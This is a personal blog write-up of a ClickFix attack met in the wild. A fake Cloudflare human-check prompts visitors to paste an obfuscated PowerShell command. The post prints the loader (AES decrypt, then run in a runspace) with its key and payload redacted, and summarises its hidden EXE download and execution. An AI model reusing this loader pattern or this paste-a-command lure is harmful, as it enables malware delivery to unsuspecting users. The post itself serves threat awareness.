ClickFix Attack Write Up

The internet can be an interesting and dangerous place. While doing research the other day for a project, I finally encountered a site that seems to have been taken over by my malicious actors to execute a ClickFix style attack. ClickFix Social Engineering schemes have gained popularity in recent months, but this was my first time encountering one in the wild. I wanted to share a quick write-up for interested colleagues, even though its different from what I was intending to do with this page.

 

There are several variations on the ClickFix theme, but they all follow a similar pattern. When accessing a site, a banner of some kind prompts the user to open a run dialog on their machine and paste and obfuscated command. The commands execute a malicious payload to deliver whatever form of malware attackers wish. From this point on, the attacker can complete whatever they wish with the victim’s machine. The rest of this post is an analysis of what happened but the site that I visited. For everyone’s safety, I won’t share the site and have slightly altered code samples to point to non-existent locations.

 

Upon visiting the malicious page, users are greeted with something resembling a Cloudflare banner to confirm humanity.

 

Selecting the "Verify you are human" option opens a dialog to help the attack.

 

This is where alarm bells immediately went off. No random web page should ever ask to run something as admin! The string copied was the following- 


$chunk9m=[Security.Cryptography.RijndaelManaged]::new();$chunk9m.Key=[Convert]::FromBase64String('REDACTED');$chunk9m.IV=[Convert]::FromBase64String('REDACTED');$chunk9m.Mode='CBC';$chunk9m.Padding='PKCS7';$record4k=[Convert]::FromBase64String('REDACTED');$response8d=[Text.Encoding]::UTF8.GetString($chunk9m.CreateDecryptor().TransformFinalBlock($record4k,0,$record4k.Length));$chunk9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($response8d);$pp.Invoke();$rs.Close();exit

Not wanting to execute the code and still see what it did, I turned to ChatGPT to help with some deobfuscation. The authors in the attack go to great lengths to hide what the chucks (replaced with REDACTED) are attempting to do.

ChatGPT helped to return the following- 


Downloads an EXE from:
REDACTED

Saves it to a random file under:
%LOCALAPPDATA%\Temp\random\random.exe

Runs it hidden:
Start-Process -WindowStyle Hidden

Then attempts to delete the EXE.

This is just an example of the attack, but I was rather interesting to take and look and see what's going on across the web. Microsoft seems to be taking some action against this attack vector, according to the learn article linked at the top, but results may be mixed.

Stay safe out there!

Comments

Post a Comment

Popular posts from this blog

PowerShell Logging Part 2 — Rotating Your Logs

Image
  A few weeks ago, I wrote a post about using PowerShell for logging script outputs and mentioned there’d be a part two. So here we go, finally. PowerShell logging is great for keeping track of data, but log files can quickly get too big. This makes it hard to find what you need or manage storage. With a simple script, you can split logs into separate files when needed. $logPath = "c:\Scripts\NICPingCheck.log" #Check if old log files exist and delete them if (Test-Path "$logPath.old") { Remove-Item "$logPath.old" -Force Write-Host "Old log file removed." } else { Write-Host "No old log file found to remove." } #Rename the current log file to .old if (Test-Path $logPath) { Rename-Item -Path $logPath -NewName "$logPath.old" -Force Write-Host "Current log file renamed to .old." } The script starts by deleting any files ending in .old. Next, it renames the current log file to add .old, so you al...
Read more

PowerShell Logging — Recording the Output of Your Scripts

Image
PowerShell is one of the most powerful tools in an administrator's toolbox, and I use it daily. The more I do with PowerShell, the more I need to record my script and save my script output as reference or proof of the changes made. For example, when did that condition-based automation fire, and what did it do, or what data did you update from that data extract from HR against AD? PowerShell provides several options, and here are my favorites. Write-Host The simplest option is the "Write-Host" command, which returns the output to the command window. This is great for returning simple values; you can watch as the script runs. By including the variable after the write host command, you can print its value at that point in the code for reference- $timestamp = (Get-Date).ToString("yyyy-MM-dd HH:mm:ss") $message = "Logging Blog" Write-Host "$timestamp - $message" Typically, this wouldn't record the output anywhere other than i...
Read more

Home Lab Hardware 2.0 – New Hosts

Image
     While working on some projects in my home lab recently, I’ve begun encountering resource shortages. Many of these shortages stem from my original intention to utilize repurposed desktop hardware. Although my lab no longer uses VMware, I still utilize it for work and read content, such as William Lam’s blog . While browsing his VCF9 content, I began to notice some relatively inexpensive machines that would meet my needs by providing more CPU and RAM for my workloads. The Minisforum MS-A2 immediately came to consideration due to its 16-core/32-thread AMD processor and the ability to support up to 96GB of RAM. However, shipping is relatively delayed, and I don’t need the smallest form factor available. Further research led me to the Minisforum 795S7 , which has similar specifications but in a larger case.     The 795S7 fits exactly what I was looking for in a lab machine. The processor and RAM mentioned above enable me to reduce the required number of hosts f...
Read more